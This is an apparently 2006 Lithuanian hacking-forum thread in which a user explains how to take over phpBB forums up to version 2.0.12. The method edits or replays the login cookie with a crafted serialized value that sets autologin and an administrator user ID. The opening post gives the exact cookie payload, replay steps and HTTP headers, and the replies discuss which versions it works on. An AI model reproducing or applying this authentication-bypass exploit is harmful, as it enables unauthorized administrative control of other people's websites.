[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(./includes/bbcode.php): failed to open stream: No such file or directory
[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(): Failed opening './includes/bbcode.php' for inclusion (include_path='.:/opt/alt/php74/usr/share/pear')
Straipsniai.lt •Hacked on phpBB <= 2.0.12 by n00b37
Puslapis 11

Hacked on phpBB <= 2.0.12 by n00b37

Parašytas: 2006 05 30 11:52
Qw3rty
na va dabar as jums parasisiu kaip galima perimti musu mylimus forumus ant phpBB.

Aprasisiu kaip dariti tai su firefoxu ir musu "mylimu" Internet Explorer.

Internet Explorer

Irasinejame adresa musu taikinio, mes turime ijunkti cookies, ir rejestrojames.
Turime ijungti opcia zinok slaptazoti, ar pan...

Paskuj einame i kataloga kur yra cookies C:\Documents and Settings\[$useriovardas]\Cookies
Ieskome sausainio is musu forumo buna kaskas panasaus:
Szukamy w nim ciasteczka z naszego forum, przeważnie:
[userionaimas]@[Forumonaimas],atidarome tai su notepad jis turi prasideti taip:phpbb2mysql_data[ir cia numeriukai]
Tuose "makonose" randame kaska tokio
:
a%3A0%3A%7B%7D ir tai mes pervardiname :

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22useri d%22%3Bs%3A1%3A%222%22%3B%7D

Irasome cookies, ant ie dodame funkcja reload ir mes jau adminai :)

Mozzila Firefox

Su firefox bus lengviau.

Downloadiname labai idomu plugina http://livehttpheaders.mozdev.org/
instalojam ir restartuojam ff.

jungiames su forumu, nereika rejestruotis :D,
Einame Tools => Live HTTP Headers
ir laukiame kol saitas uzsiloadins,paskuj aukiame kada mums pasirodis kaskas tuokio:

GET /phpbb2/index.php HTTP/1.1
Host : localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)
Gecko/20041107 Firefox/1.0
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,t ext/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D

Paskuj clickiname Replay ir

Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Pervardink tai

Kodas: Pasirinkti visus

a%3A0%3A%7B%7D
situo

Kodas: Pasirinkti visus

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22useri  d%22%3Bs%3A1%3A%222%22%3B%7D
Dar karta replay ir viskas mes adminai :D
zinau sis postas nera geriausias bet neks nepradeda hackoti teo (telekomo) serveriu :)
Big thx 4 securityfocus.net

Parašytas: 2006 05 30 11:53
Qw3rty
nezinau kodel bet man gavos 3 temos :shock: :?: :?: :? :?

Parašytas: 2006 05 30 13:47
Xgreem
Galejai geriau antroje hack temoje parasyti.Ten kskp seniai sujudimas kox buvo ;)

Parašytas: 2006 05 30 14:51
Sibiras
Good for noobs :? geriau butum parases koky 2.0.20 hacked o ne caro ruriko laiku foruma hacking

Parašytas: 2006 05 30 16:18
mrg
Tut buvo visai idomus, tik bandydamas susiduriau su keliais nenumatytais atvejais, nuejus i foruma, ir paleidus tools Live Http headers, kraunasi tiek kad man nusibosta laukti, del kokiu priezasciu tai gali ivykti? Paziurejau google headerius ir aptikau idomu dalyka, kad
HTTP/1.x 200 OK
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Tue, 30 May 2006 13:15:14 GMT
X-Cache: MISS from proxy.ISP.lt
X-Cache-Lookup: MISS from proxy.ISP.lt:3128
Connection: close


GET /complete/search?hl=en HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com/webhp?complete=1&hl=en
Cookie: PREF=ID=bf8d736975537bfc:TM=1148992462:LM=1148992462:S=VIxFFaxpB4ozC8Vv

HTTP/1.x 200 OK
Content-Type: text/html; charset=utf-8
Server: Auto-Completion Server
Cache-Control: private, x-gzip-ok=""
Date: Tue, 30 May 2006 13:15:15 GMT
X-Cache: MISS from proxy.ISP.lt
X-Cache-Lookup: MISS from proxy.ISP.lt:3128
Connection: close
Nejau mano ISP prikiso prie to nagus? Ir ka reiskia tas zodis "rejestrojames" :)

Parašytas: 2006 05 30 17:05
Qw3rty
rejestruojames t.y. REJESTRUOJAMES
O kai nueini i foruma tai ijungi livehttphdrs ir duodi reload

Parašytas: 2006 05 30 18:06
GODhack
Taip: senas geras exploitas is senu geru laiku. Labai paprastas ir dar labiau efektyvus. Dabar tai sunkiausia dalis darant kas cia parasyta tai rast pakankamai sena phpbb versija, kad viskas suveiktu.

Parašytas: 2006 07 19 21:50
DF
Jai exploitas tinka 2.0.12 versijai ar jis tiks ankstesnems? pvz 2.0.10 ir pan.

Parašytas: 2006 07 20 01:51
GODhack
Prie exploito daznai rasoma <= 2.0.12.
<= zenklas programavimo kalbose reiskia "maziau arba lygu".
O jei tik rasoma 2.0.12 be <= tai matyt tik = arba < nieks nebande.

Parašytas: 2006 07 20 12:34
DF
A, supratau.